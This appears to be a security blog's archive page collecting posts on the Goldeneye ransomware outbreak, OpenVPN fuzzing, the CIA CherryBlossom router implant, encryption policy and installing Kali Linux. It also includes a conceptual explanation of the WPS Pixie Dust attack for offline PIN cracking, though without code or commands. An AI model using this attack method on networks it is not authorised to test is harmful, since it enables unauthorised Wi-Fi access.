Skip to content

Cyber attack hits CHERNOBYL radiation system: ‘Goldeneye’ ransomware strikes

Chernobyl’s radiation monitoring system has been hit by the attack with its sensors shut down while UK advertising giant WPP, the largest agency in the world, among dozens of firms affected.

The ransomware appears to have been spread through popular accounting software and specifically targeted at bringing down business IT systems.

The outage began in Ukraine as the country’s power grid, airport, national bank and communications firms were first to report problems, before it spread rapidly throughout Europe.

Companies in the US, Germany, Norway, Russia, Denmark and France are among those to have confirmed issues so far

 Users are being shown a message saying their data has been encrypted, with some asking for £300 in anonymous currency Bitcoin to retrieve it (pictured, an ATM in Ukraine)

More than 200,000 victims in 150 countries were infected by that software, which originated in the UK and Spain last month, before spreading globally.

But cyber security experts have warned that this time the virus is much more dangerous because it has no ‘kill switch’ and is designed to spread rapidly though networks.

Marcus Hutchins, who foiled the previous WannaCry attack by discovering a way to stop it from infecting new computers, told MailOnline that even if users pay the fee their files could now be lost forever.

He said: ‘The company that hosts the email account which the ransomware asks you to contact has closed the account. There’s no way to get files back.

‘It’s early days – we don’t know if we can find a fix yet. But if it’s decryptable we will find a way.’

Hutchins, 22, continued: ‘Everyone’s looking at this right now and I’m working with other researchers.

‘I was just praying it wasn’t the Wannacry exploit again. Ideally we’ll have to find a way to decrypt the files or else people are not going to get them back.’

The ransomware targets computers using the Windows XP operating system which have not installed the latest security updates released by Microsoft.

KALI Linux – Promiscous Mode – Wireless hacking


Six Modes of Wireless

  • Monitor
  • Managed
  • Ad hoc
  • Master
  • Managed
  • Mesh
  • Repeater

A Cyberattack ‘the World Isn’t Ready For’





Reference NYTIMES

Qubes OS – Privacy

qubes os

The OpenVPN post-audit bug bonanza

I love OpenVPN, and wish them the best of luck, in resolving these issues.



I’ve discovered 4 important security vulnerabilities in OpenVPN. Interestingly, these were not found by the two recently completed audits of OpenVPN code. Below you’ll find mostly technical information about the vulnerabilities and about how  I found them, but also some commentary on why commissioning code audits isn’t always the best way to find vulnerabilities.

Here you can find the latest version of OpenVPN:

This was a labor of love. Nobody paid me to do this. If you appreciate this effort, please donate BTC to 1D5vYkiLwRptKP1LCnt4V1TPUgk7cxvVtg.


After a hardening of the OpenVPN code (as commissioned by the Dutch intelligence service AIVD) and two recent audits 1 2, I thought it was now time for some real action ;).

Most of this issues were found through fuzzing. I hate admitting it, but my chops in the arcane art of reviewing code manually, acquired through grueling practice, are dwarfed by the fuzzer in one fell swoop; the mortal’s mind can only retain and comprehend so much information at a time, and for programs that perform long cycles of complex, deeply nested operations it is simply not feasible to expect a human to perform an encompassing and reliable verification.

End users and companies who want to invest in validating the security of an application written in an “unsafe” language like C, such as those who crowd-funded the OpenVPN audit, should not request a manual source code audit, but rather task the experts with the goal of ensuring intended operation and finding vulnerabilities, using that strategy that provides the optimal yield for a given funding window.

Upon first thought you’d assume both endeavors boil down to the same thing, but my fuzzing-based strategy is evidently more effective. What’s more, once a set of fuzzers has been written, these can be integrated into a continuous integration environment for permanent protection henceforth, whereas a code review only provides a “snapshot” security assessment of a particular software version.

Manual reviews may still be part of the effort, but only there where automation (fuzzing) is not adequate. Some examples:

  • verify cryptographic operations
  • other application-level logic, like path traversal (though a fuzzer may help if you’re clever)
  • determine the extent to which timing discrepancies divulge sensitive information
  • determine the extent to which size of (encrypted) transmitted data divulges sensitive information (see also). Beyond the sphere of cryptanalysis, I think this is an underappreciated way of looking at security.
  • applications that contain a lot of pointer comparisons (not a very good practice to begin with — OpenVPN is very clean in this regard, by the way) may require manual inspection to see if behavior relies on pointer values (example)
  • can memory leaks (which may be considered a vulnerability themselves) can lead to more severe vulnerabilities? (eg. will memory corruption take place if the system is drained of memory?)
  • can very large inputs (say megabytes, gigabytes, which would be very slow to fuzz) cause problems?
  • does the software rely on the behavior of certain library versions/flavors? (eg. a libc function that behaves a certain way with glibc may behave differently with the BSD libc — I’ve tried making a case around the use of ctime() in OpenVPN)

So doing a code audit to find memory vulnerabilities in a C program is a little like asking car wash employees to clean your car with a makeup brush. A very noble pursuit indeed, and if you manage to complete it, the overall results may be even better than automated water blasting, but unless you have infinite funds and time, resources are better spent on cleaning the exterior with a machine, vacuuming the interior followed by an evaluation of the overall cleanliness, and acting where necessary.


The CIA has been hacking dozens of Wi-Fi routers and using them as covert listening points for at least a DECADE, leaked documents reveal

Leaked CIA documents have revealed the agency has been hacking people’s Wi-Fi routers and using them as covert listening points.

Infected routers are used to spy on the activity of internet-connected device, according to decade-old secret documents leaked on Thursday by Wikileaks.

Home routers from 10 US manufacturers, including Linksys, DLink, and Belkin, have been used by the CIA to monitor internet traffic.

Wikileaks released the entire 175-page CIA user manual for the implant, which is codenamed ‘CherryBlossom’.


In total, the manual says that the firmware runs on 25 router models, but could run on more than 100 with minor modifications.


‘The Cherry Blossom (CB) system provides a means of monitoring the internet activity of and performing software exploits on targets of interest,’ the document reads.

‘In particular, CB is focused on compromising wireless networking devices, such as wireless (802.11) routers and access points (APs), to achieve these goals.’

The firmware is especially effective against some D-Link-made DIR-130 and Linksys-manufactured WRT300N models because they can be remotely infected even if they have a strong administrator password.

An exploit codenamed ‘tomato’ can extract passwords from these routers if a default feature known as universal plug and play is left on.

Missions tasks include copying some or all of the user’s internet traffic, email exchanges and private chat usernames.

All exchanges between the Flytrap and device and the CIA’s CherryTree server are encrypted and and cryptographically authenticated.

The documents date back to 2007, meaning the agency has been using the Wi-Fi hack for at least a decade.


PRIVACY: Data leads to Social Cooling

If you feel you are being watched,
you change your behavior.

Big Data is supercharging this effect.


People are starting to realize that this ‘digital reputation’ could limit their opportunities.

(And that these algorithms are often biased, and built on poor data.)

People are changing their behavior to get better scores.

This has good and bad sides.

Social Cooling describes the long-term negative side effects of living in a reputation economy:

Theresa May’s repeated calls to ban encryption still won’t work

In the wake of Saturday’s terrorist attack in London, the Prime Minister Theresa May has again called for new laws to regulate the internet, demanding that internet companies do more to stamp out spaces where terrorists can communicate freely.

The arguments against banning encryption are well rehearsed, but worth repeating. Encryption is not just a tool used by terrorists. Anyone who uses the internet uses encryption. Messaging apps, online banking, e-commerce, government websites, or your local hospital all use encryption.

A ban on encryption would make it impossible to do anything online that relies on keeping things private, like sending your credit card details or messaging your doctor.

Even if governments were willing to sacrifice their citizen’s online privacy, any sort of ban would be futile anyway. Anyone with a little technical know-how could write their own code to encrypt and decrypt data. In fact, the code to do so is so small it easily fits on a t-shirt.

Another way to get rid of May’s “safe spaces” that has been mooted is to give security services special access to encrypted messages, so-called back doors. Again this is impractical.

If a “master key” was created that allowed security services to bypass encryption it would immediately become a target for hackers. Anyone feeling hostile could focus their efforts on cracking the master key, and in doing so would not just get access to one person’s data, but everyone’s.

Last month New Scientist called for a greater understanding of technology among politicians.


Thoughts.  The New Scientist has rightly called for a greater understanding amongst politicians.

What Teresa May is actually saying is:

  1. We ban internet banking (as that relies on encryption for security).
  2. We ban internet shopping (as Amazon relies on encryption too).
  3. We ban basically, all transactions on the Internet.

Do you agree with her?

The Internet and Encryption go hand in hand, you cannot use one safely without the other.  I don’t see where she’s going with this argument, as it is a non starter.

However, it does show her lack of understanding of how the Internet relies upon encryption to function.


KALI – How to hack WIFI – WPS Pixie Dust Attack

WPS Pixie Dust Attack

A bit of background first. The Pixie Dust Attack is a WPS attack aimed to crack the PIN offline, exploiting the non-existing or low entropy of some APs. This vulnerability was discovered by Dominique Bongard. All credits for the research go to him.


The roles of the devices in a common WPS transaction are:
– Registrar: client/attacker
– Enrollee: access point

Let’s have a look at part of the information exchanged between the two (|| means concatenation):
– Enrollee -> Registrar: M1 (E-Nonce || description || PKE)
– Registrar -> Enrollee: M2 (E-Nonce || R-Nonce || description || PKR)
– Enrollee -> Registrar: M3 (R-Nonce || E-Hash1 || E-Hash2)

PKE: Public Key Enrollee (g^A mod p)
PKR: Public Key Registrar (g^B mod p)
E-Nonce: Enrollee Nonce
R-Nonce: Registrar Nonce

And now comes the interesting part:
– E-Hash1: HMAC{AuthKey}(ES-1 || PSK1 || PKE || PKR)
– E-Hash2: HMAC{AuthKey}(ES-2 || PSK2 || PKE || PKR)

PSK1 is a truncated hash of the first 4 digits of the WPS pin
PSK2 is a truncated hash of the last 4 digits of the WPS pin

On M3 packet the AP is proving us that it knows the first half of the pin (with E-Hash1) and the second half (with E-Hash2). Of those two hashes we know everything except PSK1 and ES-1 and PSK2 and ES-2 respectivly.
– PSK1 and PSK2 needs only 10,000 + 1,000 guesses to find (if the last digit is used as checksum or 20,000 if not).
– ES-1 and ES-2 are two 128 bits random nonces, which would be impossible to bruteforce, right?

The question now is how are they generated? Are they truly random? No, not for every AP/manufacturer at least. Bongard looked up at two implementation: Ralink and Broadcom.
– The former uses ES-1 = ES-2 = 0 (constant) so we just need to bruteforce the PIN with 11000 guesses.
– The latter has the code of its random function publicy hosted online on GitHub (lol). It will work only for some old devices, though (probably those ones shipped from 2011 – 2013).

It uses the r_rand() function from C (wich is not secure) that uses a Linear Congruential Generator and its entropy is of 25 bits only (instant to bruteforce).
The ES-1 is calculated after the E-Nonce so you just need to guess the seed (25 bits of entropy) until you find the same sequence that leads to the E-Nonce. That’s it.

Now aside for those two manufacturers, it is also importat to mention that the majority of APs (if not all) use random pseudo-namber generators of 32 bits and have low entropy at boot. So more vulnerabilities are out there just need to be discovered by someone.

Now let’s talk about the tool, pixiewps.


KALI Linux – How to install KALI LINUX using VirtualBox – on Windows 10

Installing Kali Linux on your Windows 10 laptop is easy, if we use VirtualBox.


Step 1 – Download VirtualBox for Windows

vb download

Run > as Admin

Installer starts > Next > Next (just accept all the defaults)

vb install 1

Warning > Yes

vb warning


vb install

Install > Finish

vb install 3

VirtualBox Opens

vb opens


Step 2 – Download a VirtualBox Kali image

These images have a default password of “toor” and may have pre-generated SSH host keys.

Select Kali Linux 64 bit VBOX

kali vb images

You’ll get the *.ova file appear.

vb files

Step 3 – Import Kali Image

File > Import

vb file import

Browse to the Kali Image > Next

vb import 1

Next, the settings will appear > Import

vb import 2



vb importing

Kali Imported

vb kali imported


vb start

USB Error – we need the extension pack – for USB 2.0 and 3.0 devices.

vb usb error

Download VirtualBox Extension Pack

vb usb download

vb extn

Run and Install Extension Pack > I agree

vb extn install

Installed successfully > OK

vb extn installed


Now, lets try the “START” arrow again

Kali launches a login prompt – remember the password

Username = root

Password = toor

vb kali login

Kali Splashscreen – Yay!

kali splashscreen


Step 4 – Update the Kali Image

Open a shell and enter the following commands, to update the repositories.

kali update

kali update


That’s it.

You have Kali Linux 2017.1 installed.










%d bloggers like this: